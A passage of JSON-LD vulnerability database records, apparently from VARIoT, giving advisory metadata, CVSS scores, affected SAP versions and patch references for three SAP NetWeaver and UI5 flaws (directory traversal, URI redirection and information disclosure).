"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Directory traversal vulnerability in the Exportability Check Service in SAP NetWeaver allows remote attackers to read arbitrary files via unspecified vectors. SAP NetWeaver is the technical foundation of SAP\u0027s integrated technology platform and all SAP applications since SAP Business Suite. SAP NetWeaver is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. \nRemote attackers can use specially crafted requests with directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files in the context of the application. This may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6821"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005200"
},
{
"db": "CNVD",
"id": "CNVD-2013-01227"
},
{
"db": "BID",
"id": "58090"
},
{
"db": "IVD",
"id": "8933ff62-1f34-11e6-abef-000c29c66e3d"
}
],
"trust": 2.61
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6821",
"trust": 2.9
},
{
"db": "BID",
"id": "58090",
"trust": 1.5
},
{
"db": "CNVD",
"id": "CNVD-2013-01227",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201311-292",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005200",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201302-486",
"trust": 0.6
},
{
"db": "IVD",
"id": "8933FF62-1F34-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "8933ff62-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01227"
},
{
"db": "BID",
"id": "58090"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005200"
},
{
"db": "NVD",
"id": "CVE-2013-6821"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-486"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-292"
}
]
},
"id": "VAR-201311-0367",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "8933ff62-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01227"
}
],
"trust": 1.218644048
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "8933ff62-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01227"
}
]
},
"last_update_date": "2023-12-18T13:25:01.723000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "Patch for the SAP NetWeaver Exportability Check Service Directory Traversal Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/32131"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01227"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005200"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005200"
},
{
"db": "NVD",
"id": "CVE-2013-6821"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.6,
"url": "https://service.sap.com/sap/support/notes/1628537"
},
{
"trust": 1.4,
"url": "http://erpscan.com/advisories/dsecrg-13-003-sap-netweaver-exportability-check-service-unauthorized-directory-traversal/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/dsecrg-13-003-sap-netweaver-exportability-check-service-unauthorized-directory-traversal/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6821"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6821"
},
{
"trust": 0.6,
"url": "http://www.securelist.com/en/advisories/52256http"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/58090"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-01227"
},
{
"db": "BID",
"id": "58090"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005200"
},
{
"db": "NVD",
"id": "CVE-2013-6821"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-486"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-292"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "8933ff62-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01227"
},
{
"db": "BID",
"id": "58090"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005200"
},
{
"db": "NVD",
"id": "CVE-2013-6821"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-486"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-292"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-25T00:00:00",
"db": "IVD",
"id": "8933ff62-1f34-11e6-abef-000c29c66e3d"
},
{
"date": "2013-02-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01227"
},
{
"date": "2013-01-31T00:00:00",
"db": "BID",
"id": "58090"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005200"
},
{
"date": "2013-11-20T14:12:31.007000",
"db": "NVD",
"id": "CVE-2013-6821"
},
{
"date": "2013-01-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-486"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-292"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-01227"
},
{
"date": "2013-11-21T00:47:00",
"db": "BID",
"id": "58090"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005200"
},
{
"date": "2018-12-10T19:29:01.983000",
"db": "NVD",
"id": "CVE-2013-6821"
},
{
"date": "2013-02-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-486"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-292"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201302-486"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-292"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Exportability Check Service Directory Traversal Vulnerability",
"sources": [
{
"db": "IVD",
"id": "8933ff62-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-01227"
},
{
"db": "BID",
"id": "58090"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-486"
}
],
"trust": 1.7
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Path traversal",
"sources": [
{
"db": "IVD",
"id": "8933ff62-1f34-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-486"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-292"
}
],
"trust": 1.4
}
}
var-201708-1657
Vulnerability from variot
SAP NetWeaver is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201708-1657",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100172"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100172"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.\nAn attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.",
"sources": [
{
"db": "BID",
"id": "100172"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100172",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100172"
}
]
},
"id": "VAR-201708-1657",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:45:11.825000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "www.sap.com/platform/netweaver"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/08/08/sap-security-patch-day-august-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100172"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100172"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-08T00:00:00",
"db": "BID",
"id": "100172"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-08T00:00:00",
"db": "BID",
"id": "100172"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100172"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Logon Application URI Redirection Vulnerability",
"sources": [
{
"db": "BID",
"id": "100172"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100172"
}
],
"trust": 0.3
}
}
var-201806-1435
Vulnerability from variot
Under certain conditions SAP UI5 Handler allows an attacker to access information which would otherwise be restricted. Software components affected are: SAP Infrastructure 1.0, SAP UI 7.4, 7.5, 7.51, 7.52 and version 2.0 of SAP UI for SAP NetWeaver 7.00. SAP UI5 Handler is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201806-1435",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ui",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.52"
},
{
"model": "ui",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.51"
},
{
"model": "ui",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.5"
},
{
"model": "ui",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.4"
},
{
"model": "ui",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "2.0"
},
{
"model": "infrastructure",
"scope": "eq",
"trust": 2.4,
"vendor": "sap",
"version": "1.0"
},
{
"model": "ui5 handler",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "104446"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006476"
},
{
"db": "NVD",
"id": "CVE-2018-2428"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-733"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:ui:7.52:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:infrastructure:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui:2.0:*:*:*:*:netweaver_7.0:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui:7.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui:7.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:ui:7.51:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2428"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported the issue.",
"sources": [
{
"db": "BID",
"id": "104446"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2428",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-2428",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.3,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-2428",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-2428",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "cna@sap.com",
"id": "CVE-2018-2428",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201806-733",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006476"
},
{
"db": "NVD",
"id": "CVE-2018-2428"
},
{
"db": "NVD",
"id": "CVE-2018-2428"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-733"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Under certain conditions SAP UI5 Handler allows an attacker to access information which would otherwise be restricted. Software components affected are: SAP Infrastructure 1.0, SAP UI 7.4, 7.5, 7.51, 7.52 and version 2.0 of SAP UI for SAP NetWeaver 7.00. SAP UI5 Handler is prone to an information-disclosure vulnerability. \nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2428"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006476"
},
{
"db": "BID",
"id": "104446"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-2428",
"trust": 2.7
},
{
"db": "BID",
"id": "104446",
"trust": 1.9
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006476",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201806-733",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "104446"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006476"
},
{
"db": "NVD",
"id": "CVE-2018-2428"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-733"
}
]
},
"id": "VAR-201806-1435",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:02:34.823000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "June 2018 Security Releases",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=495289255"
},
{
"title": "SAP Infrastructure and UI Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=80898"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006476"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-733"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
},
{
"problemtype": "CWE-200",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006476"
},
{
"db": "NVD",
"id": "CVE-2018-2428"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=495289255"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/104446"
},
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/2621121"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-2428"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-2428"
},
{
"trust": 0.3,
"url": "http://www.sap.com"
}
],
"sources": [
{
"db": "BID",
"id": "104446"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006476"
},
{
"db": "NVD",
"id": "CVE-2018-2428"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-733"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "104446"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-006476"
},
{
"db": "NVD",
"id": "CVE-2018-2428"
},
{
"db": "CNNVD",
"id": "CNNVD-201806-733"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-12T00:00:00",
"db": "BID",
"id": "104446"
},
{
"date": "2018-08-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006476"
},
{
"date": "2018-06-12T15:29:00.413000",
"db": "NVD",
"id": "CVE-2018-2428"
},
{
"date": "2018-06-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201806-733"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-12T00:00:00",
"db": "BID",
"id": "104446"
},
{
"date": "2018-08-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-006476"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2018-2428"
},
{
"date": "2020-10-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201806-733"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201806-733"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP UI5 Handler Vulnerable to information disclosure",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-006476"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201806-733"
}
],
"trust": 0.6
}
}
var-201411-0218
Vulnerability from variot
